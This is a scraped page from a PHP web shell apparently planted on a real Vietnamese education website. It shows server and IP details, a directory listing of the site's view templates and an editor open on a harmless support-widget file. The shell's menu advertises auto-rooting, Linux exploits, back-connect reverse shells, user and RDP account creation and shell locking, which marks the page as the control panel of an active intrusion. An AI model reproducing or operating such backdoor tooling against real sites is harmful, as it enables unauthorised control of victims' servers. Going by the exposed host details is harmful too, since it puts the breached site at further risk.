Linux vps.sdns.vn 3.10.0-1160.99.1.el7.x86_64 #1 SMP Wed Sep 13 14:19:20 UTC 2023 x86_64
LiteSpeed
: 103.74.117.127 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
7.3.33
pcem
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
pcem /
domains /
pcem.edu.vn /
public_html /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
PHPMailer
[ DIR ]
drwxr-xr-x
view_about.php
12.91
KB
-rw-r--r--
view_article _type.php
0
B
-rw-r--r--
view_article.php
18.81
KB
-rw-r--r--
view_brand.php
394
B
-rw-r--r--
view_call_btn.php
11.57
KB
-rw-r--r--
view_confirm.php
883
B
-rw-r--r--
view_contact.php
13.05
KB
-rw-r--r--
view_criteria.php
437
B
-rw-r--r--
view_customer.php
1.92
KB
-rw-r--r--
view_detail_about.php
2.56
KB
-rw-r--r--
view_detail_article.php
21.69
KB
-rw-r--r--
view_detail_document.php
1.85
KB
-rw-r--r--
view_detail_media.php
2.72
KB
-rw-r--r--
view_detail_product.php
3.27
KB
-rw-r--r--
view_document.php
2.58
KB
-rw-r--r--
view_footer.php
4.07
KB
-rw-r--r--
view_header.php
6.78
KB
-rw-r--r--
view_hits.php
871
B
-rw-r--r--
view_home.php
19.52
KB
-rw-r--r--
view_huongdan.php
699
B
-rw-r--r--
view_index.php
3.73
KB
-rw-r--r--
view_khachhangtaiphat.php
1.99
KB
-rw-r--r--
view_lang.php
2.04
KB
-rw-r--r--
view_login.php
9.89
KB
-rw-r--r--
view_media.php
3.26
KB
-rw-r--r--
view_media_type.php
0
B
-rw-r--r--
view_menu_left.php
212
B
-rw-r--r--
view_menu_top.php
1.93
KB
-rw-r--r--
view_menuhome.php
0
B
-rw-r--r--
view_order_detail.php
3.41
KB
-rw-r--r--
view_partner.php
963
B
-rw-r--r--
view_pay_cart.php
42.97
KB
-rw-r--r--
view_pay_cart_not_isset.php
335
B
-rw-r--r--
view_pay_cart_result.php
1.68
KB
-rw-r--r--
view_product.php
2
KB
-rw-r--r--
view_product_cat.php
2.08
KB
-rw-r--r--
view_product_cat3.php
1.99
KB
-rw-r--r--
view_product_cat4.php
1.99
KB
-rw-r--r--
view_product_new.php
1.99
KB
-rw-r--r--
view_register.php
6.61
KB
-rw-r--r--
view_search.php
18.67
KB
-rw-r--r--
view_shopping_cart.php
1.99
KB
-rw-r--r--
view_showroom.php
1.5
KB
-rw-r--r--
view_slideshow - Copy.php
1.38
KB
-rw-r--r--
view_slideshow.php
565
B
-rw-r--r--
view_support.php
1.54
KB
-rw-r--r--
view_thuvien.php
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view_support.php
<div class="msupport"> <div class="titlemproduct"><?php echo GUI_SUPPORT;?></div> <ul> <?php if(isset($list_support) && $list_support != null){ $i = 1; $html=''; foreach($list_support as $item){ if($item['phone'] != null){ $html .= '<li>'.GUI_PHONE.': '.$item['phone'].'</li>'; } if(trim($item['fax']) != null){ $html .= '<li>'.GUI_FAX.': '.$item['fax'].'</li>'; } if($item['email'] != null){ $html .= '<li>'.GUI_EMAIL.': '.$item['email'].'</li>'; } $html .= '<li>'; if($item['skype'] != '') $html .= '<span><a style="padding:0;" href="skype:'.$item['skype'].'?chat" rel="nofollow"></a> '; if($item['yahoo'] != '') $html .= '<a style="padding:0;" href="ymsgr:sendIM?'.$item['yahoo'].'"></a>'; if($item['regency_'.$lang_current] != '') $html .= '<br/><strong>'.$item['regency_'.$lang_current].'</strong>'; $html .= '</li>'; if($item['hotline'] == 1){ if($i == count($list_support)) $html .= '<li class="lasted">'; else $html .= '<li>'; if($item['name_'.$lang_current] != '') $html .= '<strong style="color: red;">'.GUI_HOTLINE.': '.$item['mobile'].' </strong> - '.$item['name_'.$lang_current]; else $html .= '<strong style="color: red;"> '.GUI_HOTLINE.': '.$item['mobile'].'</strong>'; $html .= '</li>'; $i++; } echo $html; } } ?> </ul> </div>
Close